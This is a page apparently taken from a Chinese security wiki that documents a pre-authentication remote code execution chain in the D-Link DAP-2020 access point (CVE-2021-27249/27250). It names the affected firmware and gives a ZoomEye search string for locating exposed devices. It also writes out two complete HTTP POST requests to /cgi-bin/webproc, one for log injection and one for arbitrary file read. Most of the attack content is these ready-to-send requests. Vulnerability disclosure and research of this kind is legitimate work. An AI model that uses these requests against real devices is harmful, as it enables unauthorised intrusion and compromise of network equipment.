menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right --Vulnerability-main chevron_right D-Link DAP-2020远程代码执行 (CVE-2021-27249-2021-27250).md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    D-Link DAP-2020远程代码执行 (CVE-2021-27249-2021-27250).md
    2.36 KB / 2021-05-21 09:14:38
        # D-Link DAP-2020远程代码执行 (CVE-2021-27249/2021-27250)
    
    CVE:CVE-2021-27249,CVE-2021-27250
    
    受影响设备:
    
    DAP-2020(硬件版本:A1,固件版本:6.10)
    
    详细分析:https://suid.ch/research/DAP-2020_Preauth_RCE_Chain.html
    
    ZoomEye:/webproc
    
    **Blind RCE:**
    
    WEB_CmdFileList 函数尝试根据用户使用进程打开(popen)的输入来检查文件是否存在于特定目录中,虽然它执行了字符串清理操作,攻击者依然可以绕过它。
    
    poc.py:https://suid.ch/research/DAP-2020_Preauth_RCE_Chain.html
    
    **Log注入**
    
    
    ```
    POST /cgi-bin/webproc HTTP/1.1
    Host: dlinkap
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: de,en-US;q=0.7,en;q=0.3
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 203
    Origin: http://dlinkap
    DNT: 1
    Connection: close
    Referer: http://dlinkap/cgi-bin/webproc
    Cookie: sessionid=365dfaef; auth=nok; expires=Mon, 31-Jan-2050 16:00:00 GMT; Lan_IPAddress=dlinkap; language=zh_cn; sys_UserName=admin; expires=Mon, 31-Jan-2050 16:00:00 GMT; langmanulset=yes
    Upgrade-Insecure-Requests: 1
    
    getpage=html%2Findex.html&errorpage=/var/log/sysevent.txt&var%3Amenu=setup&var%3Apage=wizard&var%3Alogin=true&obj-action=auth&%3Ausername=CONTROLLED&%3Apassword=test&%3Aaction=login&%3Asessionid=365dfaef
    ```
    
    **任意文件读取**
    
    
    ```
    POST /cgi-bin/webproc HTTP/1.1
    Host: dlinkap
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: de,en-US;q=0.7,en;q=0.3
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 198
    Origin: http://dlinkap
    DNT: 1
    Connection: close
    Referer: http://dlinkap/cgi-bin/webproc
    Cookie: sessionid=365dfaef; auth=nok; expires=Mon, 31-Jan-2050 16:00:00 GMT; Lan_IPAddress=dlinkap; language=zh_cn; sys_UserName=admin; expires=Mon, 31-Jan-2050 16:00:00 GMT; langmanulset=yes
    Upgrade-Insecure-Requests: 1
    
    getpage=html%2Findex.html&errorpage=/var/log/sysevent.txt&var%3Amenu=setup&var%3Apage=wizard&var%3Alogin=true&obj-action=auth&%3Ausername=admin&%3Apassword=test&%3Aaction=login&%3Asessionid=365dfaef
    
    ```
    
    ref:
    
    https://suid.ch/research/DAP-2020_Preauth_RCE_Chain.html
    
    links
    file_download